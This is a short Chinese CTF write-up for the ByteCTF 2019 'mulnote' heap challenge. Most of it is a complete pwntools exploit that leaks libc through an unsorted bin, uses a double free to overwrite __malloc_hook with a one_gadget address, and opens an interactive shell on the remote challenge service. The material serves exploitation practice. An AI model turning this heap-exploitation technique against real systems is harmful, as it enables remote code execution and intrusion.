BYTECTF2019-mulnote

算是第一次在比赛时间里解出堆题?2333菜鸡只能做签到题了

感觉主要难点就是控制流平坦化吧,但是note的写法比较固定了,稍微猜一猜就猜出了程序的逻辑。

unsorted bin leak出libc地址,然后double free拿malloc_hook,经常看见这样的题目。

exp:

#coding=UTF-8
from pwn import *
from LibcSearcher import *
# Author's one_gadget candidate offsets.  They only hold for the challenge's
# exact libc build, which this page does not identify; the exploit sequence
# below uses a single entry, onegadget[1].
onegadget = [
    0x45216,
    0x4526a,
    0xf02a4,
    0xf1147,
]
def Create(size, content):
    """Drive the program's "C" (create) menu entry on the global ``sh`` connection.

    ``size`` is normalised through ``int`` before being sent, so numeric and
    numeric-string values are both accepted.  ``content`` is written with
    ``send`` rather than ``sendline``, i.e. exactly as given.
    """
    # Answer the menu and size prompts in order, each with sendline.
    dialogue = ((">", "C"), ("size>", str(int(size))))
    for prompt, reply in dialogue:
        sh.recvuntil(prompt)
        sh.sendline(reply)
    # The note body is sent raw once the program asks for it.
    sh.recvuntil("note>")
    sh.send(content)
def Edit(index, content):
    """Drive the "E" (edit) menu entry: select note ``index`` and send ``content``.

    Unlike ``Create``, ``index`` is sent unconverted, so callers pass it in the
    form the program expects.  ``content`` is sent raw (``send``, no newline).
    """
    for prompt, reply in ((">", "E"), ("index>", index)):
        sh.recvuntil(prompt)
        sh.sendline(reply)
    sh.recvuntil("note>")
    sh.send(content)
def Remove(index):
    """Drive the "R" (remove) menu entry for note ``index`` (sent unconverted)."""
    for prompt, reply in ((">", "R"), ("index>", index)):
        sh.recvuntil(prompt)
        sh.sendline(reply)
def Show():
    """Drive the "S" (show) menu entry.

    Only the selection is sent; whatever the program prints afterwards is
    left on the connection for the caller to read.
    """
    menu_prompt = ">"
    sh.recvuntil(menu_prompt)
    sh.sendline("S")
def XB(index, size):
    """Drive the "XxXxBbBb" menu entry: pick note ``index`` and send a new ``size``.

    The selection string is written with ``send`` (no newline); ``size`` is
    normalised through ``int`` as in ``Create``.  This helper is defined but
    not called by the exploit sequence below.
    """
    sh.recvuntil(">")
    sh.send("XxXxBbBb")
    # The index prompt is matched on "index" alone (no trailing ">"), and the
    # size prompt on the literal "new size>size>" -- both kept verbatim.
    answers = (("index", index), ("new size>size>", str(int(size))))
    for prompt, reply in answers:
        sh.recvuntil(prompt)
        sh.sendline(reply)

#sh=process("./mulnote")
# Target selection: the local ``process`` line is left commented out, so this
# run always talks to the remote challenge service.
sh=remote("112.126.101.96",9999)
# Step 1 (as the write-up states): allocate, free note 0 and read it back via
# Show() to obtain a libc pointer from the freed chunk.
Create(0x80,"1")
Create(16,'2')
Remove("0")
Show()
sh.recvuntil("note[0]:\n")
# NOTE(review): str/bytes concatenation here assumes Python 2 (see the coding
# header); on Python 3 recv() returns bytes and this line would need b'\x00\x00'.
leak=u64(sh.recv(6)+'\x00\x00')
# The constants below are the author's hard-coded libc offsets and only hold
# for the challenge's libc build (not identified on this page).  LibcSearcher
# is imported at the top of the file but not used here.
malloc_hook=leak-88-0x10
libcbase=leak-88-0x3C4B20
# Logs the same value as ``malloc_hook`` (recomputed rather than reused).
log.success("malloc_hook: "+hex(leak-88-0x10))
# Step 2 (as the write-up states): a double free on the two 0x60 notes,
# followed by four Creates whose stated aim is to reach malloc_hook.  The
# -0x23 offset and the 19-byte padding are not explained on this page.
Create(0x60,'\x11')
Create(0x60,'\x22')
Remove("2")
Remove("3")
Remove("2")
Create(0x60,p64(malloc_hook-0x23))
Create(0x60,p64(malloc_hook-0x23))
Create(0x60,p64(malloc_hook-0x23))
Create(0x60,'\x00'*19+p64(libcbase+onegadget[1]))
# Step 3: start one more "C" request but stop at the size prompt; the size is
# left for the user to type once the connection is handed over by interactive().
sh.recvuntil(">")
sh.sendline("C")
sh.recvuntil("size>")
sh.interactive()